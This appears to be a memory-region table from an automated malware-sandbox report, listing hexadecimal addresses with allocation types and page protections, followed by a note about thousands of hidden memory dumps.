7FE8B078000
trusted library allocation
page read and write
56BD000
heap
page read and write
6A0000
heap
page read and write
5830000
heap
page read and write
375000
heap
page read and write
408000
unkown
page readonly
295000
stack
page read and write
ECF000
trusted library allocation
page read and write
45C000
unkown
page readonly
61B7000
heap
page read and write
603000
heap
page read and write
6AF000
heap
page read and write
1C553000
heap
page read and write
1F0000
heap
page read and write
360000
heap
page read and write
3CCA000
stack
page read and write
1B170000
heap
page read and write
509B000
heap
page read and write
373000
heap
page read and write
5557000
heap
page read and write
3E62000
heap
page read and write
54F000
heap
page read and write
4D0000
heap
page read and write
3E8E000
heap
page read and write
183000
stack
page read and write
3459000
trusted library allocation
page read and write
401000
unkown
page execute read
2227000
heap
page read and write
4C0000
heap
page read and write
585E000
heap
page read and write
563000
heap
page read and write
362000
heap
page read and write
3C70000
trusted library allocation
page read and write
160000
heap
page read and write
58C1000
heap
page read and write
9FFB000
direct allocation
page execute and read and write
347000
heap
page read and write
49D000
heap
page read and write
4858000
heap
page read and write
2A05000
trusted library allocation
page read and write
250000
heap
page read and write
4A30000
heap
page read and write
19D000
trusted library allocation
page execute and read and write
557000
heap
page read and write
12421000
trusted library allocation
page read and write
9FF9000
direct allocation
page execute and read and write
690000
heap
page read and write
3905000
trusted library allocation
page read and write
A075000
direct allocation
page execute and read and write
600E000
heap
page read and write
7FE8AF30000
trusted library allocation
page execute and read and write
56AD000
heap
page read and write
7FE8994A000
trusted library allocation
page read and write
319000
heap
page read and write
1ADED000
stack
page read and write
4854000
heap
page read and write
45C000
system
page execute and read and write
7FFFFF00000
trusted library allocation
page execute and read and write
46F000
unkown
page readonly
6B8000
heap
page read and write
2E8000
stack
page read and write
2F58000
trusted library allocation
page read and write
1E49000
heap
page read and write
10000
heap
page read and write
B20000
heap
page read and write
3AC000
heap
page read and write
25FF000
stack
page read and write
375000
heap
page read and write
561A000
heap
page read and write
2D35000
trusted library allocation
page read and write
51B3000
heap
page read and write
45A000
heap
page read and write
1C99F000
stack
page read and write
45C000
system
page execute and read and write
7FE8AE74000
trusted library allocation
page read and write
21E3000
heap
page read and write
48F9000
heap
page read and write
D73000
trusted library allocation
page read and write
35C1000
trusted library allocation
page read and write
1C7DC000
stack
page read and write
3B0000
heap
page read and write
597000
heap
page read and write
3487000
trusted library allocation
page read and write
6229000
heap
page read and write
39B4000
trusted library allocation
page read and write
E40000
direct allocation
page read and write
DF0000
direct allocation
page read and write
400000
unkown
page readonly
3CD0000
trusted library allocation
page read and write
3A1000
heap
page read and write
4E5000
heap
page read and write
51D1000
heap
page read and write
4810000
trusted library allocation
page execute and read and write
925000
trusted library allocation
page execute and read and write
5B0000
heap
page read and write
930000
trusted library allocation
page read and write
45C000
unkown
page readonly
46F000
unkown
page readonly
8C000
stack
page read and write
3680000
trusted library allocation
page read and write
4A66000
heap
page read and write
21EE000
heap
page read and write
46B2000
heap
page read and write
1C300000
heap
page read and write
2510000
trusted library allocation
page read and write
395000
heap
page read and write
31D0000
trusted library allocation
page read and write
5859000
heap
page read and write
3E8E000
heap
page read and write
340000
heap
page read and write
2300000
trusted library allocation
page read and write
6D8000
heap
page read and write
2123000
heap
page read and write
3E7E000
heap
page read and write
490000
heap
page read and write
1C8F000
heap
page read and write
1C2C0000
heap
page read and write
456000
system
page execute and read and write
4C8000
heap
page read and write
1EB0000
heap
page read and write
2CD000
stack
page read and write
8A0000
direct allocation
page read and write
7B0000
heap
page read and write
45C000
unkown
page readonly
18C000
stack
page read and write
56B5000
heap
page read and write
450000
heap
page read and write
5BB4000
heap
page read and write
393000
heap
page read and write
A066000
direct allocation
page execute and read and write
46B9000
heap
page read and write
12462000
trusted library allocation
page read and write
5FF000
heap
page read and write
40A000
unkown
page read and write
67B000
heap
page read and write
5CB8000
heap
page read and write
2E0000
heap
page execute and read and write
10000
heap
page read and write
36D000
heap
page read and write
2400000
trusted library allocation
page read and write
1A6D0000
heap
page execute and read and write
3BB0000
trusted library allocation
page read and write
520000
heap
page read and write
510000
heap
page read and write
4B6000
heap
page read and write
30D000
heap
page read and write
340A000
heap
page read and write
A03C000
direct allocation
page execute and read and write
1C58C000
stack
page read and write
A0C5000
direct allocation
page execute and read and write
495F000
stack
page read and write
7FFFFF10000
trusted library allocation
page execute and read and write
5C89000
heap
page read and write
48F9000
heap
page read and write
EA0000
direct allocation
page read and write
585A000
heap
page read and write
2D0000
trusted library allocation
page read and write
5BA8000
heap
page read and write
6AF000
heap
page read and write
20000
heap
page read and write
7FFFFF87000
trusted library allocation
page execute read
212C000
heap
page read and write
16C000
stack
page read and write
DD0000
direct allocation
page read and write
408000
unkown
page readonly
571E000
stack
page read and write
469A000
heap
page read and write
579000
heap
page read and write
5B91000
heap
page read and write
28B0000
trusted library allocation
page read and write
18C000
stack
page read and write
7FE8B027000
trusted library allocation
page read and write
1C5C000
heap
page read and write
4AE8000
heap
page read and write
240000
trusted library allocation
page read and write
45A000
heap
page read and write
7FE8B074000
trusted library allocation
page read and write
56C0000
heap
page read and write
40A000
unkown
page write copy
1CC000
stack
page read and write
27F000
stack
page read and write
451F000
stack
page read and write
3D90000
heap
page read and write
47E9000
heap
page read and write
61A000
heap
page read and write
46F000
unkown
page readonly
1DE4000
heap
page read and write
2700000
trusted library allocation
page read and write
46C9000
heap
page read and write
33DB000
heap
page read and write
7FFFFF89000
trusted library allocation
page execute read
23B0000
heap
page read and write
2C08000
trusted library allocation
page read and write
48FB000
heap
page read and write
3282000
trusted library allocation
page read and write
2D42000
trusted library allocation
page read and write
1C5A4000
heap
page read and write
401000
unkown
page execute read
1AA30000
heap
page read and write
2700000
heap
page read and write
42C000
unkown
page read and write
568B000
heap
page read and write
400000
system
page execute and read and write
1C40000
heap
page read and write
2CA0000
remote allocation
page read and write
400000
system
page execute and read and write
473000
system
page execute and read and write
1B0DE000
stack
page read and write
5859000
heap
page read and write
62C000
heap
page read and write
5B85000
heap
page read and write
433000
trusted library allocation
page execute and read and write
6B7000
heap
page read and write
25AD000
stack
page read and write
6215000
heap
page read and write
590000
heap
page read and write
7FE89800000
trusted library allocation
page read and write
220F000
stack
page read and write
518D000
heap
page read and write
28B0000
trusted library allocation
page read and write
1C61000
heap
page read and write
5BB0000
trusted library allocation
page read and write
3C9A000
trusted library allocation
page read and write
2247F000
stack
page read and write
21CD0000
trusted library allocation
page read and write
4A3000
unkown
page readonly
2AD000
heap
page read and write
1E49000
heap
page read and write
401000
unkown
page execute read
400000
unkown
page readonly
1E57000
direct allocation
page read and write
43E0000
trusted library allocation
page read and write
CA0000
trusted library allocation
page read and write
452F000
stack
page read and write
4A60000
heap
page read and write
634D000
stack
page read and write
408000
unkown
page readonly
280000
direct allocation
page read and write
5576000
heap
page read and write
401000
unkown
page execute read
5BFB000
heap
page read and write
5869000
heap
page read and write
3CD5000
trusted library allocation
page read and write
41B000
system
page execute and read and write
1C4D4000
heap
page read and write
F60000
trusted library allocation
page read and write
360000
trusted library allocation
page read and write
10000
heap
page read and write
223000
stack
page read and write
5096000
heap
page read and write
2D42000
trusted library allocation
page read and write
3371000
heap
page read and write
56D2000
heap
page read and write
393000
direct allocation
page read and write
400000
system
page execute and read and write
42C000
unkown
page read and write
6180000
heap
page read and write
1AC1F000
heap
page read and write
401000
unkown
page execute read
379000
heap
page read and write
1C2DC000
heap
page read and write
46A2000
heap
page read and write
1B1F6000
heap
page read and write
6232000
heap
page read and write
There are 3093 hidden memdumps, click here to show them.